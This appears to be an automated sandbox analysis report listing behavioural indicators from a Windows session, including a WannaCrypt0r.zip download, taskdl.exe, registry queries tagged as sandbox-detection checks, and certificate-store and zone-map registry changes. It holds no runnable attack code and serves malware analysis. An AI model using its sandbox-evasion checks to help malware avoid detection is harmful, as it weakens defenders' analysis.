Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskdl.exe

Checks SCSI registry key(s) 3 TTPs 5 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

description	ioc	Process
Set value (data)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr\PartitionTableCache = 0000000004000000a2808484d8f468e90000000000000000000000000000000000000000000000000000000000000000000000000000000000001000000000000000c01200000000ffffffff000000002701010000080000a28084840000000000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000d01200000000000020ed3a000000ffffffff000000000700010000680900a2808484000000000000d012000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000f0ff3a0000000000000005000000ffffffff000000000700010000f87f1da2808484000000000000f0ff3a00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff000000000000000000000000a280848400000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000	vssvc.exe
Set value (data)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr\SnapshotDataCache = 534e41505041525401000000700000008ec7416a0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000	vssvc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters	vssvc.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters	vssvc.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr	vssvc.exe

Checks processor information in registry 2 TTPs 34 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	firefox.exe

Enumerates system info in registry 2 TTPs 6 IoCs

Query Registry

System Information Discovery

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe

Modifies data under HKEY_USERS 63 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\Identities\{01F67AFF-EEE1-4787-A7C1-76078A017F57}	eazfuscator.net.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Identities	eazfuscator.net.exe
Key created	\REGISTRY\USER\.DEFAULT\Identities\{01F67AFF-EEE1-4787-A7C1-76078A017F57}\Software\Microsoft\WAB	eazfuscator.net.exe
Key created	\REGISTRY\USER\.DEFAULT\Identities\{01F67AFF-EEE1-4787-A7C1-76078A017F57}\Software\Microsoft\WAB\WAB4\LastFind	eazfuscator.net.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Identities\{01F67AFF-EEE1-4787-A7C1-76078A017F57}\Software\Microsoft\WAB\WAB4\ = 881b80a8b2caa7ce	eazfuscator.net.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key deleted	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E	msiexec.exe
Key created	\REGISTRY\USER\.DEFAULT\Identities\{01F67AFF-EEE1-4787-A7C1-76078A017F57}\Software\Microsoft	eazfuscator.net.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key deleted	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26	msiexec.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Identities\{01F67AFF-EEE1-4787-A7C1-76078A017F57}\Software\Microsoft\WAB\WAB Sort State\ = 6bd231d5cd9fabacc6bed3e6287ecd549fee656219f60a42	eazfuscator.net.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Identities\{01F67AFF-EEE1-4787-A7C1-76078A017F57}\Software\Microsoft\WAB\WAB4\LastFind\ = 6bd231d5cd9fabacc6bed3e6287ecd549fee656219f60a42	eazfuscator.net.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\27	msiexec.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133726776606609063"	chrome.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Identities\{01F67AFF-EEE1-4787-A7C1-76078A017F57}\Software\Microsoft\WAB\WAB4	eazfuscator.net.exe
Key created	\REGISTRY\USER\.DEFAULT\Identities\{01F67AFF-EEE1-4787-A7C1-76078A017F57}\Software	eazfuscator.net.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Identities\{01F67AFF-EEE1-4787-A7C1-76078A017F57}\Software\Microsoft\WAB\WAB Sort State	eazfuscator.net.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	eazfuscator.net.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	eazfuscator.net.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	eazfuscator.net.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	eazfuscator.net.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	eazfuscator.net.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Identities\{01F67AFF-EEE1-4787-A7C1-76078A017F57}\ = 32d80c032617924e8ecc00293fb1ed4216dfeb7879b6c24c7ee6bfc6351102ea715c14d1a3dc0a27	eazfuscator.net.exe

Modifies registry class 29 IoCs

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\B7C6003FDAB6597419A156D52F2372DB\SourceList\Media\1 = ";"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\B7C6003FDAB6597419A156D52F2372DB\ProductIcon = "C:\\Windows\\Installer\\{F3006C7B-6BAD-4795-911A-655DF23227BD}\\icon.ico"	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\B7C6003FDAB6597419A156D52F2372DB\DeploymentFlags = "2"	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\B7C6003FDAB6597419A156D52F2372DB\AuthorizedLUAApp = "0"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\8B227A523E1793A4EA04B5CF2F0BD34E\B7C6003FDAB6597419A156D52F2372DB	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\B7C6003FDAB6597419A156D52F2372DB\SourceList\PackageName = "Eazfuscator.NET 2024.2 Setup.msi"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\B7C6003FDAB6597419A156D52F2372DB\SourceList\LastUsedSource = "n;1;C:\\Users\\Admin\\Downloads\\"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\B7C6003FDAB6597419A156D52F2372DB\ProductName = "Eazfuscator.NET"	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\B7C6003FDAB6597419A156D52F2372DB\Language = "1033"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\B7C6003FDAB6597419A156D52F2372DB\SourceList\Net\1 = "C:\\Users\\Admin\\Downloads\\"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\B7C6003FDAB6597419A156D52F2372DB\SourceList\Media\2 = ";"	msiexec.exe
Key created	\REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000_Classes\Local Settings	firefox.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\B7C6003FDAB6597419A156D52F2372DB\Assignment = "1"	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\B7C6003FDAB6597419A156D52F2372DB\AdvertiseFlags = "388"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\B7C6003FDAB6597419A156D52F2372DB\SourceList\Net\2 = "C:\\ProgramData\\Gapotchenko\\Eazfuscator.NET\\Deployment Resilency\\f3006c7b6bad4795911a655df23227bd\\"	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\B7C6003FDAB6597419A156D52F2372DB\Version = "402784857"	msiexec.exe
Key created	\REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000_Classes\Local Settings	firefox.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\B7C6003FDAB6597419A156D52F2372DB\PackageCode = "B39A04373B2B7F24D9E4D2D36299678D"	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\B7C6003FDAB6597419A156D52F2372DB\SourceList\Net	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\B7C6003FDAB6597419A156D52F2372DB\F.Obfuscator	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\B7C6003FDAB6597419A156D52F2372DB\F.Documentation	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\B7C6003FDAB6597419A156D52F2372DB	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\B7C6003FDAB6597419A156D52F2372DB\InstanceType = "0"	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\B7C6003FDAB6597419A156D52F2372DB\SourceList	msiexec.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\B7C6003FDAB6597419A156D52F2372DB\Clients = 3a0000000000	msiexec.exe
Key created	\REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000_Classes\Local Settings	firefox.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\B7C6003FDAB6597419A156D52F2372DB	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\8B227A523E1793A4EA04B5CF2F0BD34E	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\B7C6003FDAB6597419A156D52F2372DB\SourceList\Media	msiexec.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry

pid	Process
4056	reg.exe

NTFS ADS 3 IoCs

description	ioc	Process
File created	C:\Users\Admin\Downloads\Eazfuscator.NET 2024.2 Setup.msi:Zone.Identifier	firefox.exe
File created	C:\ProgramData\Gapotchenko\Eazfuscator.NET\Deployment Resilency\f3006c7b6bad4795911a655df23227bd\Eazfuscator.NET 2024.2 Setup.msi\:Zone.Identifier:$DATA	eazfuscator.net.exe
File created	C:\Users\Admin\Downloads\WannaCrypt0r.zip:Zone.Identifier	firefox.exe

Suspicious behavior: EnumeratesProcesses 52 IoCs

pid	Process
1948	msedge.exe
1948	msedge.exe
3492	msedge.exe
3492	msedge.exe
3864	identity_helper.exe
3864	identity_helper.exe
3780	msedge.exe
3780	msedge.exe
3244	chrome.exe
3244	chrome.exe
3816	msiexec.exe
3816	msiexec.exe
4396	eazfuscator.net.exe
4396	eazfuscator.net.exe
4396	eazfuscator.net.exe
4396	eazfuscator.net.exe
4396	eazfuscator.net.exe
4396	eazfuscator.net.exe
4396	eazfuscator.net.exe
4396	eazfuscator.net.exe
4396	eazfuscator.net.exe
4396	eazfuscator.net.exe
4396	eazfuscator.net.exe
2684	powershell.exe
2684	powershell.exe
2684	powershell.exe
6108	Eazfuscator.NET Enlightenment.exe
6108	Eazfuscator.NET Enlightenment.exe
6108	Eazfuscator.NET Enlightenment.exe
6108	Eazfuscator.NET Enlightenment.exe
6108	Eazfuscator.NET Enlightenment.exe
5232	Eazfuscator.NET Enlightenment.exe
5232	Eazfuscator.NET Enlightenment.exe
5232	Eazfuscator.NET Enlightenment.exe
5232	Eazfuscator.NET Enlightenment.exe
5232	Eazfuscator.NET Enlightenment.exe
5232	Eazfuscator.NET Enlightenment.exe
5232	Eazfuscator.NET Enlightenment.exe
5232	Eazfuscator.NET Enlightenment.exe
5232	Eazfuscator.NET Enlightenment.exe
5232	Eazfuscator.NET Enlightenment.exe
5232	Eazfuscator.NET Enlightenment.exe
5232	Eazfuscator.NET Enlightenment.exe
5232	Eazfuscator.NET Enlightenment.exe
5232	Eazfuscator.NET Enlightenment.exe
432	Eazfuscator.NET Assistant.exe
2612	taskhsvc.exe
2612	taskhsvc.exe
2612	taskhsvc.exe
2612	taskhsvc.exe
2612	taskhsvc.exe
2612	taskhsvc.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 19 IoCs

pid	Process
3492	msedge.exe
3492	msedge.exe
3492	msedge.exe
3492	msedge.exe
3492	msedge.exe
3492	msedge.exe
3492	msedge.exe
3492	msedge.exe
3492	msedge.exe
3492	msedge.exe
3244	chrome.exe
3244	chrome.exe
3244	chrome.exe
3244	chrome.exe
3244	chrome.exe
3244	chrome.exe
3244	chrome.exe
3244	chrome.exe
3244	chrome.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeShutdownPrivilege	3244	chrome.exe
Token: SeCreatePagefilePrivilege	3244	chrome.exe
Token: SeShutdownPrivilege	3244	chrome.exe
Token: SeCreatePagefilePrivilege	3244	chrome.exe
Token: SeShutdownPrivilege	3244	chrome.exe
Token: SeCreatePagefilePrivilege	3244	chrome.exe
Token: SeShutdownPrivilege	3244	chrome.exe
Token: SeCreatePagefilePrivilege	3244	chrome.exe
Token: SeShutdownPrivilege	3244	chrome.exe
Token: SeCreatePagefilePrivilege	3244	chrome.exe
Token: SeShutdownPrivilege	3244	chrome.exe
Token: SeCreatePagefilePrivilege	3244	chrome.exe
Token: SeShutdownPrivilege	3244	chrome.exe
Token: SeCreatePagefilePrivilege	3244	chrome.exe
Token: SeShutdownPrivilege	3244	chrome.exe
Token: SeCreatePagefilePrivilege	3244	chrome.exe
Token: SeShutdownPrivilege	3244	chrome.exe
Token: SeCreatePagefilePrivilege	3244	chrome.exe
Token: SeShutdownPrivilege	3244	chrome.exe
Token: SeCreatePagefilePrivilege	3244	chrome.exe
Token: SeShutdownPrivilege	3244	chrome.exe
Token: SeCreatePagefilePrivilege	3244	chrome.exe
Token: SeShutdownPrivilege	3244	chrome.exe
Token: SeCreatePagefilePrivilege	3244	chrome.exe
Token: SeShutdownPrivilege	3244	chrome.exe
Token: SeCreatePagefilePrivilege	3244	chrome.exe
Token: SeShutdownPrivilege	3244	chrome.exe
Token: SeCreatePagefilePrivilege	3244	chrome.exe
Token: SeShutdownPrivilege	3244	chrome.exe
Token: SeCreatePagefilePrivilege	3244	chrome.exe
Token: SeShutdownPrivilege	3244	chrome.exe
Token: SeCreatePagefilePrivilege	3244	chrome.exe
Token: SeShutdownPrivilege	3244	chrome.exe
Token: SeCreatePagefilePrivilege	3244	chrome.exe
Token: SeShutdownPrivilege	3244	chrome.exe
Token: SeCreatePagefilePrivilege	3244	chrome.exe
Token: SeShutdownPrivilege	3244	chrome.exe
Token: SeCreatePagefilePrivilege	3244	chrome.exe
Token: SeShutdownPrivilege	3244	chrome.exe
Token: SeCreatePagefilePrivilege	3244	chrome.exe
Token: SeShutdownPrivilege	3244	chrome.exe
Token: SeCreatePagefilePrivilege	3244	chrome.exe
Token: SeShutdownPrivilege	3244	chrome.exe
Token: SeCreatePagefilePrivilege	3244	chrome.exe
Token: SeShutdownPrivilege	3244	chrome.exe
Token: SeCreatePagefilePrivilege	3244	chrome.exe
Token: SeShutdownPrivilege	3244	chrome.exe
Token: SeCreatePagefilePrivilege	3244	chrome.exe
Token: SeShutdownPrivilege	3244	chrome.exe
Token: SeCreatePagefilePrivilege	3244	chrome.exe
Token: SeShutdownPrivilege	3244	chrome.exe
Token: SeCreatePagefilePrivilege	3244	chrome.exe
Token: SeShutdownPrivilege	3244	chrome.exe
Token: SeCreatePagefilePrivilege	3244	chrome.exe
Token: SeShutdownPrivilege	3244	chrome.exe
Token: SeCreatePagefilePrivilege	3244	chrome.exe
Token: SeShutdownPrivilege	3244	chrome.exe
Token: SeCreatePagefilePrivilege	3244	chrome.exe
Token: SeShutdownPrivilege	3244	chrome.exe
Token: SeCreatePagefilePrivilege	3244	chrome.exe
Token: SeShutdownPrivilege	3244	chrome.exe
Token: SeCreatePagefilePrivilege	3244	chrome.exe
Token: SeShutdownPrivilege	3244	chrome.exe
Token: SeCreatePagefilePrivilege	3244	chrome.exe

Suspicious use of FindShellTrayWindow 64 IoCs

pid	Process
3492	msedge.exe
3492	msedge.exe
3492	msedge.exe
3492	msedge.exe
3492	msedge.exe
3492	msedge.exe
3492	msedge.exe
3492	msedge.exe
3492	msedge.exe
3492	msedge.exe
3492	msedge.exe
3492	msedge.exe
3492	msedge.exe
3492	msedge.exe
3492	msedge.exe
3492	msedge.exe
3492	msedge.exe
3492	msedge.exe
3492	msedge.exe
3492	msedge.exe
3492	msedge.exe
3492	msedge.exe
3492	msedge.exe
3492	msedge.exe
3492	msedge.exe
3492	msedge.exe
3492	msedge.exe
3492	msedge.exe
3492	msedge.exe
3492	msedge.exe
3492	msedge.exe
3492	msedge.exe
3492	msedge.exe
3492	msedge.exe
3492	msedge.exe
3492	msedge.exe
3492	msedge.exe
3492	msedge.exe
3492	msedge.exe
3492	msedge.exe
3492	msedge.exe
3492	msedge.exe
3492	msedge.exe
3492	msedge.exe
3492	msedge.exe
3492	msedge.exe
3492	msedge.exe
3492	msedge.exe
3492	msedge.exe
3492	msedge.exe
3492	msedge.exe
3492	msedge.exe
3492	msedge.exe
3492	msedge.exe
3492	msedge.exe
3492	msedge.exe
3492	msedge.exe
3244	chrome.exe
3244	chrome.exe
3244	chrome.exe
3244	chrome.exe
3244	chrome.exe
3244	chrome.exe
3244	chrome.exe

Suspicious use of SendNotifyMessage 64 IoCs

pid	Process
3492	msedge.exe
3492	msedge.exe
3492	msedge.exe
3492	msedge.exe
3492	msedge.exe
3492	msedge.exe
3492	msedge.exe
3492	msedge.exe
3492	msedge.exe
3492	msedge.exe
3492	msedge.exe
3492	msedge.exe
3492	msedge.exe
3492	msedge.exe
3492	msedge.exe
3492	msedge.exe
3492	msedge.exe
3492	msedge.exe
3492	msedge.exe
3492	msedge.exe
3492	msedge.exe
3492	msedge.exe
3492	msedge.exe
3492	msedge.exe
3244	chrome.exe
3244	chrome.exe
3244	chrome.exe
3244	chrome.exe
3244	chrome.exe
3244	chrome.exe
3244	chrome.exe
3244	chrome.exe
3244	chrome.exe
3244	chrome.exe
3244	chrome.exe
3244	chrome.exe
3244	chrome.exe
3244	chrome.exe
3244	chrome.exe
3244	chrome.exe
3244	chrome.exe
3244	chrome.exe
3244	chrome.exe
3244	chrome.exe
3244	chrome.exe
3244	chrome.exe
3244	chrome.exe
3244	chrome.exe
3916	firefox.exe
3916	firefox.exe
3916	firefox.exe
3916	firefox.exe
3916	firefox.exe
3916	firefox.exe
3916	firefox.exe
3916	firefox.exe
3916	firefox.exe
3916	firefox.exe
3916	firefox.exe
3916	firefox.exe
3916	firefox.exe
3916	firefox.exe
3916	firefox.exe
3916	firefox.exe

Suspicious use of SetWindowsHookEx 28 IoCs

pid	Process
3916	firefox.exe
3916	firefox.exe
3916	firefox.exe
3916	firefox.exe
1832	firefox.exe
1832	firefox.exe
1832	firefox.exe
1832	firefox.exe
1832	firefox.exe
1832	firefox.exe
1832	firefox.exe
